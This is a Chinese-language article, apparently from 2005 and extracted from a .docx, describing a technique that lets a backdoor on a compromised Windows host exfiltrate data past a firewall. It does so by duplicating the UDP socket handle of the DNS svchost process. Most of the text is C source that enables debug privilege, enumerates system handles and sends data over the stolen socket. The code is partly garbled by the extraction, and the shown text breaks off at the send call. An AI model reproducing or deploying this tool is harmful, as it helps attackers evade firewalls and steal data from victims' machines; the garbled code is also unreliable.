一种新的穿透防火墙的数据传输技术.docx

1、一种新的穿透防火墙的数据传输技术一种新的穿透防火墙的数据传输技术使用该技术背景:在目标主机安放后门,需要将数据传输出去,同时数据很重要,动作不能太大.其他情况严重不推荐使用该技术(后面我会讲到为什么).针对目前防火墙的一些情况,如果自己的进程开一个端口(甚至是新建套接字)肯定被拦.相反,有一点我们也很清楚:被防火墙验证的进程在传送数据时永远不会被拦.所以,我的思路很简单:将其他进程中允许数据传输的套接字句柄拿为已用.过程如下:1. 找出目标进程2. 找出SOCKET句柄2. 用DuplicateHandle()函数将其SOCKET转换为能被自己使用.3. 用转换后的SOCKET进行数据传输上面

2、的过程写的很简单,但是实际实现起来还是存在一些问题(后面再做讨论).而且从上面的实现方法也可以看出一些不爽的地方:在目标进程的SOCKET不能是TCP,因为TCP的句柄已经跟外面建立了连接,所以只能是UDP.针对不同系统不同进程我们很难定位一个稳定的进程SOCKET.看到上面这些,你有点丧气了对不对,哈哈. 再想一想,其实我们有一条真正的通罗马的黄金大道.我们知道只要一台计算机连上了网络,那么有一种数据传输是肯定不会被拦截的,那就是DNS.你能想像域名解析数据都被拦了造成的结果吗? 嘿嘿, 既然这个是永远不会被拦的, 而且它又是UDP传输, 我们就拿他开刀.下面是通过直接控制DNS进程(其实也

3、就是svchost.exe,不过对应用户名是NETWORK SERVICE)进行数据传输的例子.编程中出现了很多问题,比方说获取svchost对应用户名时没有权限(但是能够操作LOCAL SERVICE),在句柄值为0x2c时进行getsockname时会停止运行等等.具体解决方法请细看注释部分./*+Made By ZwelLzwell2005.4.12-*/#include #include #include #pragma comment(lib, ws2_32)#pragma comment(lib, wtsapi32)#define NT_SUCCESS(status)(NTSTAT

4、US)(status)=0)#define STATUS_INFO_LENGTH_MISMATCH (NTSTATUS)0xC0000004L)typedef LONGNTSTATUS;typedef struct _SYSTEM_HANDLE_INFORMATIONULONGProcessId;UCHARObjectTypeNumber;UCHARFlags;USHORTHandle;PVOIDObject;ACCESS_MASKGrantedAccess; SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;typedef ULON

5、G (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;BOOL LocateNtdllEntry ( void )BOOLret = FALSE;charNTDLL_DLL = ntdll.dll;HMODULE ntdll_dll = NULL;if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) = NULL )printf( GetModuleHandl

6、e() failed);return( FALSE );if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( ntdll_dll, ZwQuerySystemInformation ) ) )goto LocateNtdllEntry_exit;ret = TRUE;LocateNtdllEntry_exit:if ( FALSE = ret )printf( GetProcAddress() failed);ntdll_dll = NULL;return( ret );/*+This ro

7、utine is used to get a processs username from its SID-*/BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName)/ sanity checks and default valueif (pUserSid = NULL)return false;strcpy(szUserName, ?);SID_NAME_USE snu;TCHARszUser_MAX_PATH;DWORDchUser = _MAX_PATH;PDWORD pcchUser = &chUser; TCHARszDoma

8、in_MAX_PATH;DWORDchDomain = _MAX_PATH;PDWORD pcchDomain = &chDomain;/ Retrieve user name and domain name based on users SID.if (:LookupAccountSid(NULL, pUserSid, szUser, pcchUser, szDomain, pcchDomain, &snu)wsprintf(szUserName, %s, szUser);elsereturn false;return true;/*+This routine is used to get

9、the DNS processs IdHere, I use WTSEnumerateProcesses to get process user Sid, and then get the process user name. Beacause as its a NETWORK SERVICE, we cannt use OpenProcessToken to catch the DNS processs token information,even if we has the privilege in catching the SYSTEMs.-*/DWORD GetDNSProcessId

10、()PWTS_PROCESS_INFO pProcessInfo = NULL;DWORD ProcessCount = 0;charszUserName255;DWORDId = -1;if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pProcessInfo, &ProcessCount)/ dump each process descriptionfor (DWORD CurrentProcess = 0; CurrentProcess User.Sid, szAccountName,&dwAccountSize,sz

11、DomainName, &dwDomainSize, &snu);if(hProcess)CloseHandle(hProcess);if(hAccessToken)CloseHandle(hAccessToken);return true;*/*+Now, it is the most important stuff. _-*/SOCKET GetSocketFromId (DWORD PID)NTSTATUS status;PVOIDbuf = NULL;ULONGsize= 1;ULONGNumOfHandle = 0;ULONGi;PSYSTEM_HANDLE_INFORMATIONh

12、_info= NULL;HANDLEsock = NULL;DWORDn;buf=malloc(0x1000);if(buf = NULL)printf(malloc wrongn);return NULL;status = ZwQuerySystemInformation( 0x10, buf, 0x1000, &n );if(STATUS_INFO_LENGTH_MISMATCH = status)free(buf);buf=malloc(n);if(buf = NULL)printf(malloc wrongn);return NULL;status = ZwQuerySystemInf

13、ormation( 0x10, buf, n, NULL);elseprintf(ZwQuerySystemInformation wrongn);return NULL;NumOfHandle = *(ULONG*)buf;h_info = ( PSYSTEM_HANDLE_INFORMATION )(ULONG)buf+4);for(i = 0; i0)/ if port 0, then we can use itbreak;catch(.)continue;if ( buf != NULL )free( buf );return (SOCKET)sock;/*+This is not r

14、equired.-*/BOOL EnablePrivilege (PCSTR name)HANDLE hToken;BOOL rv;TOKEN_PRIVILEGES priv = 1, 0, 0, SE_PRIVILEGE_ENABLED ;LookupPrivilegeValue (0,name,&priv.Privileges0.Luid);priv.Privileges0.Attributes = SE_PRIVILEGE_ENABLED;OpenProcessToken(GetCurrentProcess (),TOKEN_ADJUST_PRIVILEGES,&hToken);Adju

15、stTokenPrivileges (hToken,FALSE,&priv,sizeof priv,0,0);rv = GetLastError () = ERROR_SUCCESS;CloseHandle (hToken);return rv;void main() WSADATA wsaData;chartestbuf255;SOCKETsock;sockaddr_in RecvAddr;int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);if (iResult != NO_ERROR)printf(Error at WSAStartup()

16、n);if(!LocateNtdllEntry()return;if(!EnablePrivilege (SE_DEBUG_NAME)printf(EnablePrivilege wrongn);return;sock = GetSocketFromId(GetDNSProcessId();if( sock=NULL)printf(GetSocketFromId wrongn);return;/Change there value.RecvAddr.sin_family = AF_INET;RecvAddr.sin_port = htons(5555); RecvAddr.sin_addr.s_addr = inet_addr(127.0.0.1);if(SOCKET_ERROR = sendto(sock, test, 5, 0, (